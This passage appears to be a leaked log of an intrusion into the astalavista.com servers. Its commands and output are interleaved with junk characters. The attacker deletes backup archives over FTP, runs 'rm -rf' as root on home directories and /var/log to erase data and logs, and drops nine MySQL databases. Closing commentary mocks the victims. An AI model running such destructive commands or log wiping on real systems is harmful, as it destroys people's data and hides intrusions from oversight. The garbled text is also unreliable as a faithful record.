' L9 R$ z, L" w3 i9 b S* S' fftp> ls -la- n- i* u- p- [* L+ V
227 Entering Passive Mode (212,254,194,163,2,189)
8 h! t9 U: d8 g3 F" D0 t150 Opening BINARY mode data connection for ‘file list’.
2 R3 g1 d4 n8 C5 {- e" x-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
/ ]* e& c0 T2 Z+ z: X: A-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2: P- T. Y. R- d- ^3 B i9 _' i1 I# b
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
9 U/ n; b6 B6 _- _-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar& ^- V. i& |& j% [; W/ |* f J
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar
$ e1 q q' n! r[snip]
( t' F/ v8 D8 ]8 ^3 J# H4 w226 Transfer complete.! ~. ^$ j9 x: e- J, H; k4 D
ftp> mdelete *
; K0 U# F: g# A7 t6 W" C Dftp> ls -la
% `. B' _ M6 Z0 J227 Entering Passive Mode (212,254,194,163,2,193)
! A% S" S0 U; O, F150 Opening BINARY mode data connection for ‘file list’.
3 h. F! [$ @/ w# `$ y& r5 O0 j226 Transfer complete.
/ F# W3 d+ V* q* M. dftp>
5 A% }, b( u% B( V6 ^2 G2 b6 [3 d% Q. k2 S7 E
sh-3.2# cd /home! R) d) X" n/ H' d" a+ O& A" `
sh-3.2# ls -la/ s( I k; C5 t) i! l: x
total 120
2 {7 {+ {& r2 o, ~+ Xdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .7 E7 t; S8 Y' B# f( ^
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
- K: H4 s& ~0 v) n* @! rdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
: U- y1 A& R4 H: ~1 r8 x' w0 N* }-rw——- 1 root root 8192 Jun 4 03:03 aquota.group, V9 v* @( B V6 g' U. R
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
+ O. C" L3 H# Q: i2 I' C& h; Adrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
3 j- Z. k- C' J; [) Q y2 v+ w* tdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup* N8 J( R, i3 i) g6 q
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
1 l2 ^% h6 t; f; e3 rdrwx–x–x 10 com com 4096 Apr 28 12:40 com
9 e. I% u0 D+ ^2 V- Ndrwxr-xr-x 2 root root 4096 May 17 2007 ftp
4 E% a) r! ~( Ndrwx—— 3 jon jon 4096 Sep 21 2007 jon" W2 k$ j; h/ u3 t3 y
drwx—— 2 root root 16384 Sep 11 2007 lost+found
$ d# {2 E% o2 B3 _2 wdrwxr-xr-x 2 root root 4096 Sep 14 2007 my0 G+ c* }4 ^& w5 ]5 ]# V2 E
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
: q# f. o' t8 X( L6 Xdrwx—— 2 jon jon 4096 Sep 15 2007 test
9 X/ I v, W9 i* }$ @drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
$ }% H; c! n, ]( b1 `3 g
2 I9 d8 P, t# v9 `& u) Z+ \sh-3.2# rm -rf backup/
8 S" e% A" q" E* R: dsh-3.2# rm -rf backup.14161/
z2 C9 i A% m' }! T6 ash-3.2# rm -rf ftp/. l6 }8 m! R$ I
sh-3.2# rm -rf jon/1 s& a9 ?, m D; A0 O
sh-3.2# rm -rf my/; t* J7 u1 n1 Z
sh-3.2# rm -rf mysqldata/
5 r# |3 s2 ~1 d0 _# |5 Fsh-3.2# rm -rf test/; T& R! v: B% {0 L3 A
sh-3.2# rm -rf tmp/
# q) g: {$ d7 @; Zsh-3.2# cd ~! b! y, b0 v( E: J) C1 L
sh-3.2# rm -rf *
0 @' W4 t% g4 Z$ |( L/ N9 y, ]sh-3.2# rm -rf /var/log/
7 ]' t7 g0 B5 Z( k2 u U* drm: cannot remove directory `/var/log//proftpd’: Directory not empty
8 N# F5 [, e( a8 G. P0 dsh-3.2# rm -rf /home/*
; \# H8 Z. h& [5 q' _) Y+ Ksh-3.2# mysql
+ V+ y- x4 Y1 S+ q7 N6 i$ sWelcome to the MySQL monitor. Commands end with ; or \g.) I) T1 w2 [) w0 U: y
Your MySQL connection id is 407156
0 W' D; G2 t5 \# @* G- ^$ `3 i+ e' }Server version: 5.0.45-community-log MySQL Community Edition (GPL)4 {* q3 M) p( i+ t# u* ]
( J. O0 L9 p4 F* z$ U0 iType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.: l" I( y0 H$ ~4 l+ w: p4 Z% ]
! f* [" I6 Q. K
mysql> show databases;( p7 x8 R& k0 V9 @
+———————–+
) U0 S0 Y# p3 a P! q/ i8 w| Database |9 Z' X2 E" _! J* j
+———————–++ h. v) Q) N: O& i9 f& u7 y% Y
| information_schema |& N* x( D8 J8 ~8 a- {4 X8 n$ _
| astanet_ads |
* P5 K S1 K! u! [- z |4 v| astanet_mailing_lists |
2 H+ m6 Z7 l' S2 n| astanet_mediawiki |8 s |7 W# |- _. y' e: c$ o4 [
| astanet_membersystem |
' y' o* G4 i" Q3 }% c2 Y- v| com_contrexx |0 q( j% E& s h5 Z% v* l5 N
| com_contrexx2 |7 ~8 f$ M, a& d
| com_contrexx2_live |4 g3 O; C3 ~0 n2 g b
| da_roundcube | Q- ^% v* o7 ^- d& |4 K5 Z
| dolphin |; `0 a: u+ \# |+ s3 C
| ideapool |
+ |3 B1 F# |# D s4 ?, t| mysql |
! f; ^; O, v4 p( {" || test |+ x" C0 Z$ m0 t M2 Q
| yourmaster |, H W9 ?% Z% ?& C
+———————–+# b5 m4 Z( f7 _6 X6 f
14 rows in set (0.03 sec)
: ?/ i5 ?9 n& \, r$ @; @6 o& p
* X- I: V! c0 \+ f* R! b9 ~mysql> drop database astanet_membersystem;# p7 K5 q( ]8 o( }$ c1 L
droQuery OK, 46 rows affected (0.81 sec)
+ {5 a: k; @: S& R1 O6 J" ^
+ {9 N1 ~3 \. e# d/ vmysql> drop database com_contrexx;
% E% L" @' g2 i1 FQuery OK, 211 rows affected (2.72 sec)
" v2 j* t+ R* @( q6 r! l7 k
% L I& N3 o+ T- F7 A" x( \mysql> drop database com_contrexx2;5 u U" O% i+ e+ |) ^! z1 j& H' E' O
Query OK, 237 rows affected (2.23 sec)
; m8 E( S9 t! I b# ?
5 g g3 S. d) \mysql> drop database com_contrexx2_live;
9 x1 H5 w- K& B B6 c( RQuery OK, 227 rows affected (7.63 sec)9 J0 Y, `( b% t/ R* v! y
( _ ~0 d& _# s% g5 R$ T7 A! Y
mysql> drop database ideapool;+ k' t$ [9 }% t1 e$ p, l
Query OK, 69 rows affected (0.19 sec)5 C( }0 C; }* N+ j: l' U
: w. _. ^1 @9 |5 u( `2 w' d, @
mysql> drop database yourmaster;
2 ^' Q0 z$ I% rQuery OK, 158 rows affected (0.55 sec)
5 o4 X4 q: o: \ n- Y( \; Q) P, L+ ~0 U5 F# S; o6 [% b
mysql> drop database astanet_ads;* s2 U; |: w4 \/ l. L# R
Query OK, 9 rows affected (0.11 sec)/ m( B2 d5 m+ b) S" t9 y
8 C3 y& c% a" `3 [mysql> drop database astanet_mailing_lists;9 J: J* l3 D. {) k M
Query OK, 24 rows affected (1.47 sec)
9 }& u4 B- j: A' Y5 g0 o1 U3 T. A6 B B1 b3 v
mysql> drop database astanet_mediawiki;
9 ~3 }/ Z, J& a3 _! M4 ?Query OK, 31 rows affected (0.51 sec)4 ], N5 Y% }) D4 `$ `% I" M# s
/ Q) `2 E. x. p* A7 b: i
mysql> show databases;
" x* \/ I2 C O& s; w M9 Q( J+——————–+
2 g C; v. m$ x) D% P1 t| Database |& q o5 `8 h- ?# L. ?1 k; u! t% z
+——————–+" `" N8 [1 v* m7 q4 O
| information_schema |( O% i: ?, U: C7 u+ `8 }: t
| da_roundcube |
/ u4 H8 h: N& @| dolphin |% l1 A" D; a% R! J+ W
| mysql |
/ C% N% [3 m7 t# b| test |
% a* R2 `: N9 z4 G. ?+——————–+7 m5 A, _: ?8 ^& E
5 rows in set (0.00 sec)
) F- n( A% s# T q8 a, j2 {0 e+ J/ x# W
What a journey! We’re not sure exactly why the “Terminator” had any influence on
t* {% y) R. G" Etheir naming (conventions) but we’re sure Arnold himself wouldn’t be in the
' F; s; b$ _% }- H: i$ X4 k! C* M) bwrong to say this pack of morons *wont be back*.
0 V F* D X+ H6 ~) b |